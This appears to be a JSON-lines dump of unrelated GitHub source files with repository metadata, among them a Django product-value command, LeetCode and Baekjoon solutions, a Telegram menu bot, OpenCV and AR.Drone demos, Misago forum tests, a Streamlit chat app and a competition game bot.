+{"seq_id":"18442718654","text":"from datetime import datetime\nfrom typing import Any, Optional\nfrom datetime import datetime\nfrom random import randint\nfrom django.core.management.base import BaseCommand\nfrom app.models import Product\nfrom app.redis_service import set_redis_value\n\nclass Command(BaseCommand):\n help = '''set an arbitrary valid value of the price, \n balance, status fields for the Product model'''\n\n def add_arguments(self, parser):\n pass \n \n def handle(self, *args: Any, **options: Any) -> Optional[str]:\n \n min = 0\n max = 10000\n all_products = Product.objects.all()\n choices = self.get_product_choices()\n\n for product in all_products:\n \n stock_value = randint(0,len(choices)-1)\n \n product.price = randint(min, max)\n product.remains = randint(min, max) \n product.status = choices[stock_value]\n \n _ = Product.objects.bulk_update(\n all_products, ['price','remains','status'], batch_size=999)\n \n set_redis_value('products_updated_at', str(datetime.now()))\n\n return self.stdout.write(self.style.SUCCESS('OK'))\n \n def get_product_choices(self) ->tuple():\n '''returns a tuple of the values \n of the field model status Product'''\n \n choices = Product._meta.get_field('status').choices\n in_stok = choices[0][0]\n out_of_stok = choices[1][0]\n \n return (in_stok,out_of_stok)\n","repo_name":"ogs13/django-products-dock","sub_path":"core/app/management/commands/set_product_values.py","file_name":"set_product_values.py","file_ext":"py","file_size_in_byte":1509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"8472887248","text":"class Solution:\n def subsets(self, nums: List[int]) -> List[List[int]]:\n ans = list()\n ans.append([])\n if not nums:\n return ans\n\n for num in nums:\n ans.extend(\n [curr + [num] for curr in ans]\n )\n \n return ans","repo_name":"robertomaldonado/LeetHubCode","sub_path":"78-subsets/78-subsets.py","file_name":"78-subsets.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"32904182863","text":"import asyncio\nimport os\nfrom gettext import gettext as _\nfrom telethon import TelegramClient\nfrom telethon.events import NewMessage, CallbackQuery, StopPropagation\nfrom telethon.tl.custom import Message\n\nfrom config import API_ID, API_HASH, BOT_TOKEN\nfrom utils import load_buttons, load_more_buttons, dynamic_import, handle_back, get_current_func, import_file, \\\n reset_current_func\n\nasyncio.set_event_loop(asyncio.new_event_loop())\nclient = TelegramClient(\"bot\", API_ID, API_HASH).start(\n bot_token=BOT_TOKEN\n)\n\n\n@client.on(NewMessage(incoming=True, pattern='^/start$'))\nasync def start(event: NewMessage.Event):\n \"\"\"\n This function is called when the user sends /start\n We want to show the user a list of buttons of the main modules\n :return:\n \"\"\"\n modules, description = dynamic_import(os.path.join(os.path.dirname(__file__), 'modules'))\n\n await event.reply(description, buttons=load_buttons(modules, add_back=False))\n\n raise StopPropagation\n\n\n@client.on(CallbackQuery)\nasync def handle_callback(event: CallbackQuery.Event):\n \"\"\"\n This function is called when the user clicks on a button\n :return:\n \"\"\"\n original_data = event.data.decode('utf-8')\n # we want to know if the clicked button is nested or not\n data = original_data.split('_')\n # the name of the module is the last element\n func_name = data[-1]\n # everything else is the location of the module\n path = data[:-1]\n # if the model is \"back\" then we're going up one level\n if func_name == \"back\":\n await event.answer(\"going back!\")\n await handle_back(event, original_data)\n return\n # we want to get the full location of the module so we can load it.\n path_location = os.path.join(os.path.dirname(__file__), 'modules', *path)\n # we dynamically load all the modules\n modules, description = dynamic_import(path_location)\n # we get the specific module that the user clicked on\n module = modules[func_name]\n # since the user clicked on this we will call the callback_func of said module.\n # If the module has no callback_func that means it has nesetd modules and we want to load more buttons\n function = module.get(\"callback_func\", load_more_buttons)\n await event.answer(_(\"Working on your request..\"))\n try:\n # you can never be sure with theses\n await function(event, original_data)\n except Exception as e:\n import traceback\n traceback.print_exc()\n await event.answer(_(\"An error has happened while processing your request\"))\n\n\n@client.on(NewMessage(incoming=True))\nasync def handle_messages(event: Message):\n \"\"\"\n This function is called when the user sends a message.\n It's purpose is to figure out what module function to call\n :param event:\n :return:\n \"\"\"\n # if the user sends cancel at any point we just resets to the start\n if event.text == \"/cancel\":\n await event.reply(_(\"Canceled\"))\n reset_current_func()\n return\n # this will return the stored function of the module that the user clicked on previously\n func = get_current_func()\n # if the user has clicked on nothing then we just tell them to do so\n if func is not None:\n # we load the module's message function to call\n func = import_file(\"func\", func).message_func\n try:\n await func(event)\n except Exception as e:\n import traceback\n traceback.print_exc()\n await event.reply(_(\"An error has happened while processing your request\"))\n # This might get spammy because we're telling the user that they can cancel after each message.\n await event.respond(_(\"Use /cancel to cancel the current request\"))\n else:\n await event.respond(_(\"Please click on /start to get a menu\"))\n\n\nprint(\"Running!\")\nclient.run_until_disconnected()\n","repo_name":"painor/modular_menu_bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"73430876560","text":"\nfrom pathlib import Path\n\nfrom datetime import datetime\nfrom pathlib import Path\nclass A:\n #writing to log file\n def write_to_log_file(self,path1,path2):\n message1=\"this is first msg \\n\"\n message2=\"this is sec msg \"\n file1= open(path1,'w')\n file1_content=file1.write(message1)\n file2=open(path2,'w')\n file2_content=file2.write(message2)\n file1.close()\n file2.close()\n f1=open(path1,'r')\n f2=open(path2,'r')\n print(f1.read())\n f1.close()\n f2.close()\n first=open(path1,'a+')\n second=open(path2,'r')\n first.write(second.read())\n first.seek(0)\n second.seek(0)\n # f1=open(file1,'a+')\n # f2=open(file2,'r')\n # f1.write(f2.read())\npath1='C:/Users/vgunaganti/PycharmProjects/HelloWorld/file1.txt'\npath2='C:/Users/vgunaganti/PycharmProjects/HelloWorld/file2.txt'\nobj=A()\nobj.write_to_log_file(path1,path2)","repo_name":"venkannagunaganti/HelloWorld","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"5263585511","text":"from django.conf import settings\n\nfrom misago.acl import add_acl\nfrom misago.forums.models import Forum\nfrom misago.readtracker import threadstracker\nfrom misago.users.testutils import AuthenticatedUserTestCase\n\nfrom misago.threads import goto\nfrom misago.threads.permissions import exclude_invisible_posts\nfrom misago.threads.testutils import post_thread, reply_thread\n\n\nPOSTS_PER_PAGE = settings.MISAGO_POSTS_PER_PAGE\nTHREAD_TAIL = settings.MISAGO_THREAD_TAIL\nMAX_PAGE_LEN = POSTS_PER_PAGE + THREAD_TAIL\n\n\nclass MockThreadsCounter(object):\n def set(self, *args, **kwargs):\n pass\n\n def decrease(self, *args, **kwargs):\n pass\n\n\nclass GotoTests(AuthenticatedUserTestCase):\n def setUp(self):\n super(GotoTests, self).setUp()\n\n self.forum = Forum.objects.all_forums().filter(role=\"forum\")[:1][0]\n self.forum.labels = []\n\n self.thread = post_thread(self.forum)\n add_acl(self.user, self.forum)\n add_acl(self.user, self.thread)\n\n def test_get_thread_pages(self):\n \"\"\"get_thread_pages returns valid count of pages for given positions\"\"\"\n self.assertEqual(goto.get_thread_pages(1), 1)\n self.assertEqual(goto.get_thread_pages(POSTS_PER_PAGE), 1)\n self.assertEqual(goto.get_thread_pages(MAX_PAGE_LEN), 1)\n self.assertEqual(goto.get_thread_pages(MAX_PAGE_LEN + 1), 2)\n self.assertEqual(goto.get_thread_pages(POSTS_PER_PAGE * 2 - 1), 2)\n self.assertEqual(goto.get_thread_pages(POSTS_PER_PAGE * 2), 2)\n\n self.assertEqual(goto.get_thread_pages(POSTS_PER_PAGE * 3), 3)\n self.assertEqual(goto.get_thread_pages(\n POSTS_PER_PAGE * 5 + THREAD_TAIL - 1), 5)\n\n def test_get_post_page(self):\n \"\"\"get_post_page returns valid page number for given queryset\"\"\"\n self.assertEqual(goto.get_post_page(1, self.thread.post_set), 1)\n\n # fill out page\n [reply_thread(self.thread) for p in xrange(MAX_PAGE_LEN - 1)]\n self.assertEqual(\n goto.get_post_page(MAX_PAGE_LEN, self.thread.post_set), 1)\n\n # add 2 posts, adding second page\n [reply_thread(self.thread) for p in xrange(2)]\n self.assertEqual(\n goto.get_post_page(MAX_PAGE_LEN + 2, self.thread.post_set), 2)\n\n def test_hashed_reverse(self):\n \"\"\"hashed_reverse returns complete url for given post\"\"\"\n url = goto.hashed_reverse(self.thread, self.thread.first_post)\n url_formats = self.thread.get_absolute_url(), self.thread.first_post_id\n self.assertEqual(url, '%s#post-%s' % url_formats)\n\n url = goto.hashed_reverse(self.thread, self.thread.first_post, 4)\n url_formats = self.thread.get_absolute_url(), self.thread.first_post_id\n self.assertEqual(url, '%s4/#post-%s' % url_formats)\n\n def test_last(self):\n \"\"\"last returns link to last post in thread\"\"\"\n url_last = goto.last(self.thread, self.thread.post_set)\n url_formats = self.thread.get_absolute_url(), self.thread.last_post_id\n self.assertEqual(url_last, '%s#post-%s' % url_formats)\n\n # add posts to reach page limit\n [reply_thread(self.thread) for p in xrange(MAX_PAGE_LEN - 1)]\n\n url_last = goto.last(self.thread, self.thread.post_set)\n url_formats = self.thread.get_absolute_url(), self.thread.last_post_id\n self.assertEqual(url_last, '%s#post-%s' % url_formats)\n\n # add 2 posts to add second page to thread\n [reply_thread(self.thread) for p in xrange(2)]\n\n url_last = goto.last(self.thread, self.thread.post_set)\n url_formats = self.thread.get_absolute_url(), self.thread.last_post_id\n self.assertEqual(url_last, '%s2/#post-%s' % url_formats)\n\n def test_get_post_link(self):\n \"\"\"get_post_link returns link to specified post\"\"\"\n post_link = goto.get_post_link(\n 1, self.thread.post_set, self.thread, self.thread.last_post)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n # add posts to add extra page to thread\n [reply_thread(self.thread) for p in xrange(MAX_PAGE_LEN)]\n\n post_link = goto.get_post_link(\n MAX_PAGE_LEN + 1,\n self.thread.post_set, self.thread, self.thread.last_post)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n def test_new(self):\n \"\"\"new returns link to first unread post\"\"\"\n self.user.new_threads = MockThreadsCounter()\n self.user.unread_threads = MockThreadsCounter()\n\n post_link = goto.new(self.user, self.thread, self.thread.post_set)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n # add extra page to thread, then read them\n [reply_thread(self.thread) for p in xrange(MAX_PAGE_LEN)]\n threadstracker.read_thread(\n self.user, self.thread, self.thread.last_post)\n\n # add extra unread posts\n first_unread = reply_thread(self.thread)\n [reply_thread(self.thread) for p in xrange(20)]\n\n new_link = goto.new(self.user, self.thread, self.thread.post_set)\n post_link = goto.get_post_link(\n MAX_PAGE_LEN + 21, self.thread.post_set, self.thread, first_unread)\n self.assertEqual(new_link, post_link)\n\n # read thread\n threadstracker.read_thread(\n self.user, self.thread, self.thread.last_post)\n\n # assert new() points to last reply\n post_link = goto.new(self.user, self.thread, self.thread.post_set)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n def test_post(self):\n \"\"\"post returns link to post given\"\"\"\n thread = self.thread\n\n post_link = goto.post(thread, thread.post_set, thread.last_post)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n\n # add 24 posts\n [reply_thread(self.thread) for p in xrange(24)]\n\n post_link = goto.post(thread, thread.post_set, thread.last_post)\n last_link = goto.last(self.thread, self.thread.post_set)\n self.assertEqual(post_link, last_link)\n","repo_name":"xuzhao1211/OnlineExam","sub_path":"misago/threads/tests/test_goto.py","file_name":"test_goto.py","file_ext":"py","file_size_in_byte":6254,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"15476646643","text":"#https://www.acmicpc.net/problem/14503\n#로봇 청소기\n#BFS로 풀이\n\nimport sys\nfrom collections import deque\ninput = sys.stdin.readline\n\nn,m = map(int, input().split()) #크기\nr,c,d = map(int, input().split()) #청소기좌표, 방향\ngraph = [] #정보\n\ndx = [-1, 0, 1, 0] #북동남서\ndy = [0, 1, 0, -1]\n\nfor i in range(n): #입력\n graph.append(list(map(int, input().split())))\n\ndef bfs(x, y, d):\n q = deque([[x, y, d]])\n cnt = 1\n while q:\n x, y, d = q.popleft()\n graph[x][y] = 2\n nd = d\n for i in range(4):\n nd = (nd-1) % 4 #방향\n nx = x + dx[nd]\n ny = y + dy[nd]\n if 0 <= nx < n and 0 <= ny < m and graph[nx][ny]==0:\n cnt += 1\n graph[nx][ny] == 2\n q.append([nx, ny, nd])\n break\n elif i == 3:\n back = (d - 2) % 4\n nx = x + dx[back]\n ny = y + dy[back]\n\n if graph[nx][ny] == 1:\n return cnt\n else:\n q.append([nx, ny, d])\n\nprint(bfs(r,c,d))\n","repo_name":"cwaa079/BaekJoon-Algorithm","sub_path":"삼성 SW 역량 테스트 기출 문제/14503.py","file_name":"14503.py","file_ext":"py","file_size_in_byte":1118,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"10101803372","text":"from array import array\nimport cv2\nimport numpy as np\n\nx1:int=0\nx2:int=0\ny1:int=0\ny2:int=0\ndrawing=False\ncrop=False\n\ndef draw(event,x,y,flags,param):\n global crop,drawing,arr,x1,x2,y1,y2\n if event==cv2.EVENT_LBUTTONDOWN:\n drawing=True\n crop=True\n \n x1,y1=x,y\n elif event==cv2.EVENT_MOUSEMOVE:\n if drawing==True:\n if crop==True:\n \n cv2.rectangle(img,(x1,y1),(x,y),(0,0,255),-1) \n elif event==cv2.EVENT_LBUTTONUP:\n if crop==True:\n drawing=False\n x2,y2=x,y\n img[:]=(20,20,20)\n img[y1:y2,x1:x2]=(255,255,255) \n \nimg=np.zeros((500,500,3),np.uint8)\nimg[:]=255\ncv2.namedWindow('sadegh')\ncv2.setMouseCallback('sadegh',draw)\nwhile True:\n k=cv2.waitKey(1)\n if k==27:\n break\n cv2.imshow('sadegh',img)\ncv2.destroyAllWindows() ","repo_name":"sadeghhidden/opencv_exercises","sub_path":"foucos.py","file_name":"foucos.py","file_ext":"py","file_size_in_byte":896,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"42110909614","text":"import Tkinter\nfrom PIL import Image as PILImage, ImageTk\nimport libardrone\nimport time\nfrom MultiCamShift import *\n\n\nclass ShowImages:\n def __init__(self):\n self.drone = None\n self.main = Tkinter.Tk()\n self.picLabel = Tkinter.Label(self.main, text = \"Waiting for ARDrone image\")\n self.picLabel.grid(row = 0, column = 0)\n \n self.dataLabel = Tkinter.Label(self.main, text = \"Waiting for Navdata\")\n self.dataLabel.grid(row=1, column = 0)\n \n self.main.bind_all('', self.respondToKeyPress)\n #self.main.bind('', self.nextPicture)\n #self.main.bind('', self.resetDrone)\n #self.main.bind('', self.takeoff)\n #self.main.bind('', self.land)\n #self.main.bind('', self.moveUp)\n #self.main.bind('', self.moveDown)\n #self.main.bind('', self.turnLeft)\n #self.main.bind('', self.turnRight)\n #self.main.bind('', self.moveForward)\n #self.main.bind('', self.moveBackward)\n #self.main.bind('', self.bankLeft)\n #self.main.bind('', self.bankRight)\n self.main.bind_all('', self.keyRelease)\n self.drone = libardrone.ARDrone(True)\n \n self.mcs = MultiCamShift(self.drone, self)\n self.mcs.start()\n \n def keyRelease(self, event):\n if event.char.lower() == 'q':\n self.quit()\n else:\n self.drone.hover()\n self.nextPicture()\n print(\"Key released:\", event.keysym)\n \n def respondToKeyPress(self, event):\n respondText = 'Key press ' + event.keysym + ': '\n key = event.char.lower()\n if key == 'n':\n self.nextPicture()\n respondText += \"Taking picture\"\n elif key == 'r':\n self.drone.land()\n self.drone.reset()\n respondText += \"Resetting drone\"\n elif event.keysym == 'Return':\n self.drone.takeoff()\n respondText += \"Taking off\"\n elif key == ' ':\n self.drone.land()\n respondText += \"Landing\"\n elif event.keysym == 'Up':\n self.drone.move_up()\n respondText += \"Moving up\"\n elif event.keysym == 'Down':\n self.drone.move_down()\n respondText += \"Moving down\"\n elif event.keysym == 'Left':\n self.drone.turn_left()\n respondText += \"Turning left\"\n elif event.keysym == 'Right':\n self.drone.turn_right()\n respondText += 'Turning right'\n elif key == 'w':\n self.drone.move_forward()\n respondText += 'Moving forward'\n elif key == 's':\n self.drone.move_backward()\n respondText += 'Moving backward'\n elif key == 'a':\n self.drone.move_left()\n respondText += 'Moving left'\n elif key == 'd':\n self.drone.move_right()\n respondText += 'Moving right'\n elif key != '' and key in '1234567890':\n newSpeed = self.keyToSpeed(event.char)\n self.drone.speed = newSpeed\n respondText += 'Changing speed to ' + str(newSpeed)\n self.outputResponse(respondText)\n\n\n def keyToSpeed(self, key):\n if key == '0':\n return 1.0\n else:\n num = int(key)\n return num / 10.0\n \n def outputResponse(self, text):\n self.dataLabel['text'] = text\n print(text)\n\n \n def nextPicture(self):\n imgArray = self.drone.image\n navData = self.drone.navdata\n pilPic = PILImage.fromarray(imgArray)\n #if event != 'foo':\n #pilPic.show()\n self.currPic = ImageTk.PhotoImage(pilPic)\n self.picLabel['image'] = self.currPic\n \n #navStr = str(navData)\n #self.dataLabel['text'] = navStr\n \n \n def quit(self):\n self.drone.land()\n print(\"Quitting!\")\n time.sleep(2)\n self.mcs.stop()\n self.main.destroy()\n \n def go(self):\n self.main.mainloop()\n \n \n\ndef runDrone():\n foo = ShowImages()\n foo.go()\n \nrunDrone()","repo_name":"tianyoul/AI-Robotics-ComputerVision","sub_path":"libardrone/FoxDemo.py","file_name":"FoxDemo.py","file_ext":"py","file_size_in_byte":4293,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"18583451476","text":"import streamlit as st\nfrom streamlit_chat import message\nfrom PIL import Image\nfrom query.vortex_query import VortexQuery\n\n\ndef initialize_page():\n st.set_page_config(page_title='DocuVortex', page_icon=':books:')\n st.image(logo_image, width=80)\n st.header(\"NeonShield DocuVortex\")\n st.markdown(\"[Github](https://github.com/pkalkman/python-docuvortex)\")\n\n\ndef handle_query_form():\n with st.form(key='query_form'):\n user_query = st.text_input('Search for: ', '', key='input',\n help='Enter your search query?')\n submit_button = st.form_submit_button('Submit')\n return user_query, submit_button\n\n\ndef display_chat_history():\n for i, (user_msg, ai_msg) in enumerate(zip(st.session_state['past'][::-1],\n st.session_state['generated'][::-1])):\n message(user_msg, is_user=True, key=f\"user_{i}\")\n message(ai_msg, key=f\"ai_{i}\")\n\n\ndef query(question: str) -> str:\n \"\"\"\n Query the VortexQuery model with the provided question\n :param question: The question to ask the model\n :return: The answer from the model\n \"\"\"\n vortex_query = VortexQuery()\n answer, _ = vortex_query.ask_question(question)\n return answer\n\n\nlogo_image = Image.open('./logo.png')\n\n# Initialize page and session state\nst.session_state.setdefault('generated', [])\nst.session_state.setdefault('past', [])\n\ninitialize_page()\nuser_query, submit_button = handle_query_form()\n\nif submit_button and user_query:\n model_response = query(user_query)\n st.session_state.past.append(user_query)\n st.session_state.generated.append(model_response)\n\ndisplay_chat_history()\n","repo_name":"PatrickKalkman/python-docuvortex","sub_path":"app/streamlit_app.py","file_name":"streamlit_app.py","file_ext":"py","file_size_in_byte":1677,"program_lang":"python","lang":"en","doc_type":"code","stars":45,"dataset":"github-code","pt":"3"}
+{"seq_id":"1288489210","text":"# ---\n# jupyter:\n# jupytext:\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.13.7\n# ---\n\n# %% tags=[\"soorgeon-imports\"]\nimport json\nimport requests\nfrom exported import search_results, collate_results, main\n\n# %% tags=[\"parameters\"]\nupstream = None\nproduct = None\n\n\n# %% [markdown]\n# ## Search\n\n# %%\ndef search_results(args,kwargs):\n response = requests.get(args,\n kwargs)\n c = response.json()\n search_results = c['hits']['hits']\n return search_results\n","repo_name":"CodeForAfrica/smat_searcher","sub_path":"tasks/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"33436313288","text":"from typing import List, Tuple, Any\n\nfrom src.game_constants import RobotType, Direction, Team, TileState, GameConstants\nfrom src.game_state import GameState, GameInfo\nfrom src.player import Player\n#from bots.aditya import *\nfrom src.map import TileInfo, RobotInfo\nimport random\n\nclass Mining_Logistics:\n def __init__(self, coordinates, direction=None, robots=None):\n self.mining_coordinates = coordinates\n if robots is None:\n self.miners = [] # should just be a list of names\n else:\n self.miners = robots\n self.mine2tt = direction # Vector mining location --> terraforming tile direction\n\n self.tt2mine = (-1 * self.mine2tt[0], -1 * self.mine2tt[1])\n self.tt_coordinates = (self.mining_coordinates[0] + self.mine2tt[0], self.mining_coordinates[1] + self.mine2tt[1])\n\nclass BotPlayer(Player):\n \"\"\"\n Players will write a child class that implements (notably the play_turn method)\n \"\"\"\n\n def __init__(self, team: Team):\n self.team = team\n self.mining_assignment = dict() # A dictionary mapping mines to a Mining_Logistics object\n self.charging_spots = []\n self.game_state = None\n return\n\n def no_collision(self, row, col):\n tile = self.game_state.get_map()[row][col]\n return tile.robot is None\n\n def sorted_mines(self, map):\n \"\"\" Input is map object list(list[TileInfo]) \"\"\"\n height, width = len(map), len(map[0])\n mines = []\n for row in map:\n for tile in row:\n if tile and tile.state == TileState.MINING:\n mines.append(tile)\n mines.sort(key=lambda x: - x.mining)\n # mines is sorted in decreasing order of capacity\n return mines\n\n def first_decision(self, map):\n \"\"\" Decide how many miners to start with, and where to place them.\n Returns list of dictionaries, sorted by capacity \"\"\"\n height, width = len(map), len(map[0])\n gmt = 15 # Good Mine Threshold\n\n def get_terra_tile(mine):\n \"\"\" Returns a dictionary with keys (tt, td) = (adjacent terra tile, directions FROM the terra tile) \"\"\"\n x, y = mine.row, mine.col\n D = {}\n for t in Direction:\n p, q = t.value\n nx, ny = x - p, y - q\n if 0 <= nx < height and 0 <= ny < width and map[nx][ny] and map[nx][\n ny].state == TileState.TERRAFORMABLE:\n D['tt'], D['td'] = (nx, ny), t\n return D\n\n M = self.sorted_mines(map)\n decision_list = [] # This is a list of dictionaries with keys tt,td,c : Terra Tile, Terra_to_mine Direction, Count\n\n if len(M) == 1:\n D = get_terra_tile(M[0])\n D['c'] = 2\n decision_list.append(D)\n\n elif len(M) == 2:\n [m1, m2] = M\n D1, D2 = get_terra_tile(m1), get_terra_tile(m2)\n p1, p2 = m1.mining, m2.mining\n c1, c2 = 1 if p1 < gmt else 2, 1 if p2 < gmt else 2\n D1['c'], D2['c'] = c1, c2\n decision_list.append(D1)\n decision_list.append(D2)\n\n elif len(M) == 3:\n [m1, m2, m3] = M\n D1, D2, D3 = get_terra_tile(m1), get_terra_tile(m2), get_terra_tile(m3)\n p1, p2, p3 = m1.mining, m2.mining, m3.mining\n if p2 < gmt:\n if 0.4 * p1 >= 0.6 * p2:\n c1, c2, c3 = 2, 0, 0\n else:\n c1, c2, c3 = 1, 1, 0\n else:\n if 0.4 * p2 >= 0.6 * p3:\n c1, c2, c3 = 2, 2, 0\n else:\n c1, c2, c3 = 2, 1, 1\n D1['c'], D2['c'], D3['c'] = c1, c2, c3\n if c1: decision_list.append(D1)\n if c2: decision_list.append(D2)\n if c3: decision_list.append(D3)\n\n else:\n [m1, m2, m3, m4] = M[:4]\n D1, D2, D3, D4 = get_terra_tile(m1), get_terra_tile(m2), get_terra_tile(m3), get_terra_tile(m4)\n p1, p2, p3, p4 = m1.mining, m2.mining, m3.mining, m4.mining\n if p2 < gmt:\n if 0.4 * p1 >= 0.6 * p2:\n c1, c2, c3, c4 = 2, 0, 0, 0\n else:\n c1, c2, c3, c4 = 1, 1, 0, 0\n else:\n if 0.4 * p2 >= 0.6 * p3:\n c1, c2, c3, c4 = 2, 2, 0, 0\n elif 0.4 * p1 < 0.6 * p4:\n c1, c2, c3, c4 = 1, 1, 1, 1\n else:\n c1, c2, c3, c4 = 2, 1, 1, 0\n D1['c'], D2['c'], D3['c'], D4['c'] = c1, c2, c3, c4\n if c1: decision_list.append(D1)\n if c2: decision_list.append(D2)\n if c3: decision_list.append(D3)\n if c4: decision_list.append(D4)\n\n return decision_list\n\n def initial_two_turns(self, game_state: GameState) -> None:\n ginfo = game_state.get_info()\n\n initial_mine_list = self.first_decision(ginfo.map)\n # move the robots\n robots = game_state.get_ally_robots()\n for rname, rob in robots.items():\n if rob.type == RobotType.MINER:\n for mine_info in initial_mine_list:\n if (rob.row, rob.col) == mine_info['tt']:\n move_dir = mine_info['td']\n if game_state.can_move_robot(rname, move_dir):\n game_state.move_robot(rname, move_dir)\n if game_state.can_robot_action(rname):\n game_state.robot_action(rname) # action the robots\n\n print(initial_mine_list)\n # spawn robots\n for mine_info in initial_mine_list:\n tt_coordinates = mine_info['tt']\n t_direction = mine_info['td'].value # From TT --> mining location\n m_direction = (-1 * t_direction[0], -1 * t_direction[1]) # From mining location --> TT\n mining_coordinates = (tt_coordinates[0] + t_direction[0], tt_coordinates[1] + t_direction[1])\n\n print(mine_info)\n if ginfo.map[mining_coordinates[0]][mining_coordinates[1]].state != TileState.MINING:\n raise Exception(\"why isn't this a mining tile??\")\n\n if mining_coordinates not in self.mining_assignment.keys():\n self.mining_assignment[mining_coordinates] = Mining_Logistics(coordinates=mining_coordinates, direction=m_direction)\n\n if 2 >= mine_info['c'] > len(self.mining_assignment[mining_coordinates].miners):\n if game_state.can_spawn_robot(RobotType.MINER, tt_coordinates[0], tt_coordinates[1]): # spawn the robots\n new_miner = game_state.spawn_robot(RobotType.MINER, tt_coordinates[0], tt_coordinates[1])\n print(new_miner.name)\n self.mining_assignment[mining_coordinates].mine2tt = (-1 * t_direction[0], -1 * t_direction[1])\n self.mining_assignment[mining_coordinates].miners.append(new_miner.name)\n\n print(self.mining_assignment)\n\n\n def general_mining_turn(self, game_state: GameState, new_mines=None) -> list[tuple[Any, Any]]:\n ginfo = game_state.get_info()\n robots = game_state.get_ally_robots()\n\n #print(self.mining_assignment.keys())\n\n # moving, actioning, or recharging\n for mining_location in self.mining_assignment:\n logistics = self.mining_assignment[mining_location]\n these_robots = logistics.miners\n\n if 1 >= len(these_robots) > 0: # FIX!!!!!!!!!!\n print(these_robots)\n miner = these_robots[0]\n miner_robot_object = robots[miner]\n if (miner_robot_object.row, miner_robot_object.col) == mining_location:\n print(\"MINING: \" + str(ginfo.turn))\n print(\"BATTERY: \" + str(miner_robot_object.battery))\n print()\n if miner_robot_object.battery >= GameConstants.MINER_ACTION_COST:\n game_state.robot_action(miner)\n else:\n if self.no_collision(*logistics.tt_coordinates):\n game_state.move_robot(miner, Direction(logistics.mine2tt))\n elif (miner_robot_object.row, miner_robot_object.col) == logistics.tt_coordinates:\n print(\"CHARGING: \" + str(ginfo.turn))\n if miner_robot_object.battery == GameConstants.INIT_BATTERY:\n if self.no_collision(*logistics.mining_coordinates):\n game_state.move_robot(miner, Direction(logistics.tt2mine))\n else:\n raise Exception(\"Miners aren't in the right place!!\")\n elif len(these_robots) == 2:\n continue\n elif len(these_robots) > 2:\n print(len(these_robots))\n raise Exception(\"Way too many robots here...\")\n\n unfinished_mines = []\n # spawning\n if new_mines is None:\n new_mines = []\n\n for mining_location, mine2tt in new_mines:\n self.mining_assignment[mining_location] = Mining_Logistics(coordinates=mining_location, direction=mine2tt)\n row = self.mining_assignment[mining_location].tt_coordinates[0]\n col = self.mining_assignment[mining_location].tt_coordinates[1]\n\n if game_state.can_spawn_robot(RobotType.MINER, row, col):\n new_miner = game_state.spawn_robot(RobotType.MINER, row, col)\n self.mining_assignment[mining_location].miners.append(new_miner.name)\n else:\n unfinished_mines.append((mining_location, mine2tt))\n print(\"Couldn't spawn at \" + str(mining_location))\n\n return unfinished_mines\n\n def terraforming_phase(self):\n ginfo = self.game_state.get_info()\n height, width = len(ginfo.map), len(ginfo.map[0])\n # Move and action the current terraform robots\n robots = self.game_state.get_ally_robots()\n\n # iterate through dictionary of robots\n for rname, rob in robots.items():\n if rob.type == RobotType.TERRAFORMER:\n\n all_dirs = [dir for dir in Direction] # find a good direction\n move_dir = Direction.DOWN_RIGHT\n for dir in all_dirs:\n if self.game_state.can_move_robot(rname, dir) and self.no_collision(rob.row + dir.value[0], rob.col + dir.value[1]):\n move_dir = dir\n\n # check if we can move in this direction\n if self.game_state.can_move_robot(rname, move_dir):\n # try to not collide into robots from our team\n dest_loc = (rob.row + move_dir.value[0], rob.col + move_dir.value[1])\n dest_tile = self.game_state.get_map()[dest_loc[0]][dest_loc[1]]\n if dest_tile.robot is None or dest_tile.robot.team != self.team:\n print(\"here\")\n self.game_state.move_robot(rname, move_dir)\n if self.game_state.can_robot_action(rname):\n self.game_state.robot_action(rname)\n\n # Spawn new terra formers.\n for row in range(height):\n for col in range(width):\n tile = ginfo.map[row][col]\n if tile is not None and tile.terraform > 0:\n if self.game_state.can_spawn_robot(RobotType.TERRAFORMER, row, col):\n self.game_state.spawn_robot(RobotType.TERRAFORMER, row, col)\n\n return\n\n def play_turn(self, game_state: GameState) -> None:\n # get info\n ginfo = game_state.get_info()\n self.game_state = game_state\n\n # Extract information\n\n if ginfo.turn <= 2:\n self.initial_two_turns(game_state)\n else:\n self.general_mining_turn(game_state)\n self.terraforming_phase()\n if ginfo.turn == 200:\n print(len(ginfo.ally_robots))\n\n\n\n","repo_name":"danielhathcock/awap2023","sub_path":"bots/sherry_aditya_bot.py","file_name":"sherry_aditya_bot.py","file_ext":"py","file_size_in_byte":12007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
